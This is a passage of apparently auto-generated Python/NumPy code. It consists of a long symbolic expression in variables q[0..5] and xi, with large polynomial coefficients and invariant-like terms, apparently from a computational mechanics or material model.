- q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 
0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 
0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - 
q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 
0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 
0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 
0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 
5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 
0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 
